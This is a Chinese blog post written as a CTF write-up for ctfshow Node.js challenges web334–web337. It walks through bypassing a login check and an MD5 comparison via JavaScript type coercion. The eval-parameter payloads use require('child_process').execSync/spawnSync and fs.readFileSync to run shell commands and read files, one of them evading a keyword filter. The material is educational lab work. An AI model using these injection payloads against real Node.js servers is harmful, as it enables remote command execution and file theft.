ctfshow-nodejs

于 2024-09-06 17:55:19 发布
阅读量563 收藏 7
点赞数 11
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72125469/article/details/136128700
版权

什么是nodejs
Node.js 是一个基于 Chrome V8 引擎的 Javascript 运行环境。可以说nodejs是一个运行环境,或者说是一个 JS 语言解释器

Nodejs 是基于 Chrome 的 V8 引擎开发的一个 C++ 程序,目的是提供一个 JS 的运行环境。最早 Nodejs 主要是安装在服务器上,辅助大家用 JS 开发高性能服务器代码,但是后来 Nodejs 在前端也大放异彩,带来了 Web 前端开发的革命。Nodejs 下运行 JS 代码有两种方式,一种是在 Node.js 的交互环境下运行,另外一种是把代码写入文件中,然后用 node 命令执行文件代码。Nodejs 跟浏览器是不同的环境,写 JS 代码的时候要注意这些差异。

这也是我第一次接触js 正好学习一下 js的前端和后端的处理方式 代码会有详细的解释

web334

首页面

后端user.js文件

module.exports = {
  items: [//这是一个属性 是一个数组 是一个包含用户名和密码的对象
    {username: 'CTFSHOW', password: '123456'}
  ]
};

后端 login.js文件

var express = require('express');//引入 Express 框架(模块),用于构建 Web 应用程序
var router = express.Router();//创建一个新的路由处理器实例,用于定义和组织路由
var users = require('../modules/user').items;//引入用户数据模块,假设这里的 user 模块包含了用户数据信息
//定义一个函数 参数为name和password
//并且使用find数组方法 遍历整个数组的元素 每个元素作为返回值传给回调函数作为参数
//判断是否有符合条件的 如果有 findUser 函数会立即返回该用户对象;如果没有找到任何匹配的用户对象,则返回 undefined
var findUser = function(name, password){
  return users.find(function(item){
    return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;
  });
};
/* GET home page. */
//这段代码是一个路由处理函数,当客户端发送 POST 请求到根路径 / 时会执行该函数
// 首先设置回复方式为html 
router.post('/', function(req, res, next) {
  res.type('html');
  var flag='flag_here';
 //通过 req.session 创建或获取当前会话的 Session 对象
  var sess = req.session;
  //获取数据中的用户名和密码作为finduser函数的参数 函数返回值赋值给user
  var user = findUser(req.body.username, req.body.password);
 //如果user存在 执行代码
 //重新生成会话,并执行回调函数。regenerate 方法用于销毁当前会话并创建一个新的会话,
 //以确保会话安全性。回调函数中的参数 err 是一个可能的错误对象。如果会话生成过程中出现错误,将通过返回一个 JSON 响应表示登录失败
  if(user){
    req.session.regenerate(function(err) {
      if(err){
        return res.json({ret_code: 2, ret_msg: '登录失败'});        
      }
       //将用户对象的用户名赋值给会话对象的 loginUser 属性
      req.session.loginUser = user.username;
	  //返回一个 JSON 响应对象,其中包含登录成功的信息,以及之前设置的 flag 变量的值
      res.json({ret_code: 0, ret_msg: '登录成功',ret_flag:flag});              
    });
  }else{
    res.json({ret_code: 1, ret_msg: '账号或密码错误'});
  }  
});
module.exports = router;

前端的js

<script>
    $('.btn').click(function(){
        login();//如果点击btn类名的元素时执行login函数
    });
    function login(){ 
        $.ajax({//开启一个异步 定义提交数据类型以及 提交的位置
            url:'/login',
            type:'post',
            data:{
                username:$('#username').val(),
                password:$('#password').val()
            },
            //数据包返回 会将数据先解析为json格式 然后进行判断
            success:function(data){
                data = JSON.parse(data);
                if(data.ret_code===0){
                   alert(data.ret_flag);
                }else{
                    alert(data.ret_msg);
                }                
            }
        });
    }
</script>

其实有用的就是 后端js的判断 

已知用户数据中有 账号为CTFSHOW 密码为123456

判断条件

 return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;

如果提交的name不等于CTFSHOW 且数据中的usernmae等于提交的name的大写 且 数据的password等于提交的password

这样提交小写的ctfshow密码为123456即可

web335

查看源码提示传一个参数 考虑到这里是nodejs,eval很有可能在后端是执行的eval函数

在nodejs中,eval()方法用于计算字符串,并把它作为脚本代码来执行,语法为“eval(string)”;如果参数不是字符串,而是整数或者是Function类型,则直接返回该整数或Function。

传入一个1 回显1 传一个ls无回显 那是正常的 因为这不是shell环境无法ls 这是nodejs环境执行的是js代码 那就想办法怎么执行js代码能做到执行shell代码

这里我们使用require()函数来加载child_process模块 然后使用execSync方法来执行系统命令

require("child_process").execSync('ls')
 

require("child_process").execSync('cat fl00g.txt')

web336

和上一题一样 没什么区别 估计是后端的处理有区别

就是禁用了exec

答案

先用__filename查看当前目录路径

然后读取当前文件名查看过滤点

require('fs').readFileSync('/app/routes/index.js','utf-8')

第一种

?eval=require( 'child_process' ).spawnSync( 'ls' ).stdout

?eval=require( 'child_process' ).spawnSync( 'ls' ).stdout.toString()
为什么?eval=require( 'child_process' ).spawnSync( 'ls' )不可以  大概解释就是他的返回结果是一个对象 不能输出 后面加入一个.stdout代表标准输出 也能成功以字符串形式输出再加一个.toString它会将被调用对象转换为字符串表示查看文件

?eval=require( 'child_process' ).spawnSync( 'cat',['fl001g.txt'] ).stdout.toString()

第二种

?eval=require("child_process")['exe'%2B'cSync']('ls')

?eval=require("child_process")['exe'%2B'cSync']('cat fl001g.txt')

第三种读取函数方式

?eval=require("fs").readdirSync('.')     查看当前目录(换成/.可查看根目录)
?eval=require("fs").readFileSync('fl001g.txt') --查看指定文件

web337

var express = require('express');//引入了 Express 模块,它是一个基于 Node.js 平台的 Web 开发框架
var router = express.Router();   //创建了一个新的路由对象
var crypto = require('crypto');  //引入了 Node.js 内置的 crypto 模块。该模块提供了一些加密和哈希算法
function md5(s) { //md5函数用于加密
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}
/* GET home page. */
//路由接收到一个get传到当前页面的数据 设置返回类型为html
router.get('/', function(req, res, next) {
  res.type('html');
  var flag='xxxxxxx';
  var a = req.query.a;
  var b = req.query.b;
  //判断条件的要求是 a和b有值且不相等 长度相等 与flag合并后md5加密相等
  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  	res.end(flag);
  }else{
  	res.render('index',{ msg: 'tql'});
  }
});
module.exports = router;

一说两个不一样的进行md5加密 还能相等 那一定就是用到了该变成语言的特性

举个例子

a={'':'1'} //定义一个对象 属性名为空 属性值为1
b={'':'2'}
const c = [1];//定义一个常量数组c 值为1 
const d = [2];
console.log(a+"flag")输出到控制台
console.log(b+"flag")
console.log(c+"flag")
console.log(d+"flag")
//回显
//直接如果是一个对象直接输出 就显示[object Object]
[object Object]flag
[object Object]flag
1flag//数组要是输出那就是数组值
2flag

php中,无论是a[0]=1,a[1]=3…这种key为0,1,2…递增的,还是a[‘x’]=1,a[‘y’]=2这种自定义key的,都叫做数组array;而js中,前者叫数组,后者叫对象(Object)

自然的出答案 这三个但一个意思 都是将a和b当成对象进行赋值

?a[x]=1&b[x]=2
?a[]=1&b[]=1

a[:]=1&b[:]=2

Hello-smile
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTFSHOW-nodejs
Yb_140的博客
05-13 856
web334 下载附件,添加后缀 .zip,之后打开,发现有两个文件login.js和user.js 发现用户名和密码 用户名不能为CTFSHOW 其中toUpperCase()函数为转为大写 所以输入的用户名为ctfshow,密码为123456 得到flag web335 查看页面源代码,发现 可能为GET传参,命令执行 在nodejs中,eval()方法用于计算字符串,并把它作为脚本代码来执行,语法为“eval(string)”;如果参数不是字符串,而是整数或者是F.
ctfshow-web入门-node.js
whisper921的博客
04-28 455
web334 先下载附件,在user.js中发现了账号密码 开环境,直接输入账号密码是错的,具体原因在login.js中 var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === passwor
CTFshow--nodejs 原型链污染
pwfortune的博客
07-27 708
flag是一个变量, 但是也不可能知道flag的值是多少, 就不可能用上一道题的方法了.给了源码, 看到 login.js 里面有个copy() 函数。都是 对象, 在执行 copy 操作 ,构造一个请求体污染了。可以看到它的源码做了一点更改, 本地测试一下, 看看如何污染。这一题里面没有了 /api 路由 ,需要找到其他的污染口。是否有 ctfshow不重要, 让它的原型拥有就行,构造相应的query的值, 得到想要执行的结果。需要嵌套两层才能污染, 其他的跟上一题是一样的。
ctfshow-web入门 nodejs篇部分题解
volcano的博客
05-16 2452
ctfshownodejsweb334web335web336web337web338参考博客 nodejs web334 先下载附件,在user.js中发现了账号密码 module.exports = { items: [ {username: 'CTFSHOW', password: '123456'} ] }; 开环境,直接输入账号密码是错的,具体原因在login.js中 var findUser = function(name, password){ return users.
rh-nodejs6-nodejs-asn1-0.2.3-2.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
influxdb-nodejs:简单的influxdb客户端
05-17
influxdb-nodejs Node.js客户端。 安装 $ npm install influxdb - nodejs 例子 查看目录以获取工作示例。 原料药 新客户 // no auth const Influx = require ( 'influxdb-nodejs' ) ; const client = new Influx ...
rh-nodejs14-nodejs-nodemon-2.0.3-1.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
rocketmq-client-nodejs:Apache RocketMQ Node.js客户端
05-03
适用于Node.js的RocketMQ客户端 这个官方的Node.js客户端是围绕 (一种经过微调的CPP客户端)的轻量级包装。 注意1:此客户端仍处于dev版本。 在生产中请谨慎使用。 注意2:该SDK现在仅支持macOS和Ubuntu 14.04 ...
color-sdk-nodejs
05-16
color-sdk-nodejs 安装 $ npm install git+https://github.com/avinoamr/color-sdk-nodejs.git 用法 var color = require ( "color-sdk-nodejs" ) ; var conn = new color . SDK ( "APIKEY" , "APISECRET" ) ; ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8449
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
(全新整理)上市公司数字经济与实体经济融合发展程度测算数据(2008-2022年)
09-06
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/141966339 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理
目标检测相关,yolo系列.zip
09-06
1 目标检测的定义 目标检测(Object Detection)的任务是找出图像中所有感兴趣的目标(物体),确定它们的类别和位置,是计算机视觉领域的核心问题之一。由于各类物体有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具有挑战性的问题。 目标检测任务可分为两个关键的子任务,目标定位和目标分类。首先检测图像中目标的位置(目标定位),然后给出每个目标的具体类别(目标分类)。输出结果是一个边界框(称为Bounding-box,一般形式为(x1,y1,x2,y2),表示框的左上角坐标和右下角坐标),一个置信度分数(Confidence Score),表示边界框中是否包含检测对象的概率和各个类别的概率(首先得到类别概率,经过Softmax可得到类别标签)。 1.1 Two stage方法 目前主流的基于深度学习的目标检测算法主要分为两类:Two stage和One stage。Two stage方法将目标检测过程分为两个阶段。第一个阶段是 Region Proposal 生成阶段,主要用于生成潜在的目标候选框(Bounding-box proposals)。这个阶段通常使用卷积神经网络(CNN)从输入图像中提取特征,然后通过一些技巧(如选择性搜索)来生成候选框。第二个阶段是分类和位置精修阶段,将第一个阶段生成的候选框输入到另一个 CNN 中进行分类,并根据分类结果对候选框的位置进行微调。Two stage 方法的优点是准确度较高,缺点是速度相对较慢。 常见Tow stage目标检测算法有:R-CNN系列、SPPNet等。 1.2 One stage方法 One stage方法直接利用模型提取特征值,并利用这些特征值进行目标的分类和定位,不需要生成Region Proposal。这种方法的优点是速度快,因为省略了Region Proposal生成的过程。One stage方法的缺点是准确度相对较低,因为它没有对潜在的目标进行预先筛选。 常见的One stage目标检测算法有:YOLO系列、SSD系列和RetinaNet等。 2 常见名词解释 2.1 NMS(Non-Maximum Suppression) 目标检测模型一般会给出目标的多个预测边界框,对成百上千的预测边界框都进行调整肯定是不可行的,需要对这些结果先进行一个大体的挑选。NMS称为非极大值抑制,作用是从众多预测边界框中挑选出最具代表性的结果,这样可以加快算法效率,其主要流程如下: 设定一个置信度分数阈值,将置信度分数小于阈值的直接过滤掉 将剩下框的置信度分数从大到小排序,选中值最大的框 遍历其余的框,如果和当前框的重叠面积(IOU)大于设定的阈值(一般为0.7),就将框删除(超过设定阈值,认为两个框的里面的物体属于同一个类别) 从未处理的框中继续选一个置信度分数最大的,重复上述过程,直至所有框处理完毕 2.2 IoU(Intersection over Union) 定义了两个边界框的重叠度,当预测边界框和真实边界框差异很小时,或重叠度很大时,表示模型产生的预测边界框很准确。边界框A、B的IOU计算公式为: 2.3 mAP(mean Average Precision) mAP即均值平均精度,是评估目标检测模型效果的最重要指标,这个值介于0到1之间,且越大越好。mAP是AP(Average Precision)的平均值,那么首先需要了解AP的概念。想要了解AP的概念,还要首先了解目标检测中Precision和Recall的概念。 首先我们设置置信度阈值(Confidence Threshold)和IoU阈值(一般设置为0.5,也会衡量0.75以及0.9的mAP值): 当一个预测边界框被认为是True Positive(TP)时,需要同时满足下面三个条件: Confidence Score > Confidence Threshold 预测类别匹配真实值(Ground truth)的类别 预测边界框的IoU大于设定的IoU阈值 不满足条件2或条件3,则认为是False Positive(FP)。当对应同一个真值有多个预测结果时,只有最高置信度分数的预测结果被认为是True Positive,其余被认为是False Positive。 Precision和Recall的概念如下图所示: Precision表示TP与预测边界框数量的比值 Recall表示TP与真实边界框数量的比值 改变不同的置信度阈值,可以获得多组Precision和Recall,Recall放X轴,Precision放Y轴,可以画出一个Precision-Recall曲线,简称P-R
8051Proteus仿真c源码用数组的指针控制P0口8位LED流水点亮
最新发布
09-06
8051Proteus仿真c源码用数组的指针控制P0 口8 位LED流水点亮提取方式是百度网盘分享地址
常见各类算法的习题和解析.zip
09-06
常见各类算法的习题和解析.zip
STM32+74HC595驱动4位数码管显示0-3.zip
09-06
STM32+74HC595驱动4位数码管显示0-3,代码逻辑参考:https://blog.csdn.net/MANONGDKY/article/details/141952401
ASP.NET001通用作业批改系统毕业课程设计项目+论文+答辩ppt
09-06
编号:52 程序开发环境:Visual Studio 2005以上版本 数据库:Sqlserver2000以上版本 程序设计语言:C# 程序实现功能: 该系统主要完成学生注册,登陆,作业的上传,教师对作业进行发布,批改等功能。包括登陆子系统,学生子系统,教师子系统和管理员子系统。 登陆子系统功能设计:登陆子系统要求,选择好自己的用户类别,均能登入,要求正确填写好登入信息。学生,老师,管理员以用户名与密码进行登入。如果用户名错误或不存在、密码错误,应当有提示[11]。注:本系统只带学生注册功能,每位老师与位学生只能对应唯一的ID。 学生用户子系统功能 1、上传作业 要求先找到上传的对象(老师),浏览本地计算机目录,找到要提交的文件,提交到对应的老师目录下,系统会自动记录下该作业提交的信息,完成提交过程,返回成功信息。 2、管理作业 要求能查询本人的成绩。对作业进行查看,删除。 3、修改个人信息 要求输入密码时候,需要密码隐藏模式现实;输入新密码时,要对密码进行二次检验,和长度检验;修改成功后提示成功。可修改除帐户以外的所有信息。 教师子系统功能设计 1、修改个人资料
国产数据库DM8预研报告
09-06
国产数据库DM8预研报告
8051Proteus仿真c源码将数据0xaa写入X5045再读出送P1口显示
09-06
8051Proteus仿真c源码将数据0xaa写入X5045再读出送P1口显示提取方式是百度网盘分享地址
tencentcloud-sdk-nodejs-nlp怎么导入uniapp
05-18
要在uniapp中使用tencentcloud-sdk-nodejs-nlp,你可以尝试以下步骤: 1. 在你的uniapp项目中创建一个新的文件夹,例如“tencentcloud-sdk-nodejs-nlp”。 2. 在该文件夹下,创建一个新的js文件,例如“index.js”,并将tencentcloud-sdk-nodejs-nlp的代码复制到该文件中。 3. 在该js文件中,将需要的模块导出为一个对象,例如: ``` const tencentcloud = require('tencentcloud-sdk-nodejs'); const NlpClient = tencentcloud.nlp.v20190408.Client; const models = tencentcloud.nlp.v20190408.Models; module.exports = { NlpClient, models }; ``` 4. 在需要使用tencentcloud-sdk-nodejs-nlp的uniapp页面中,导入该js文件并使用需要的模块,例如: ``` import { NlpClient, models } from '@/tencentcloud-sdk-nodejs-nlp/index.js'; // 使用NlpClient和models ``` 注意,这种导入方式需要将tencentcloud-sdk-nodejs-nlp的代码复制到uniapp项目中,并且可能需要进行一些调整以适应uniapp的运行环境。另外,由于tencentcloud-sdk-nodejs-nlp是基于Node.js开发的,因此可能无法在所有uniapp平台上运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello-smile

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值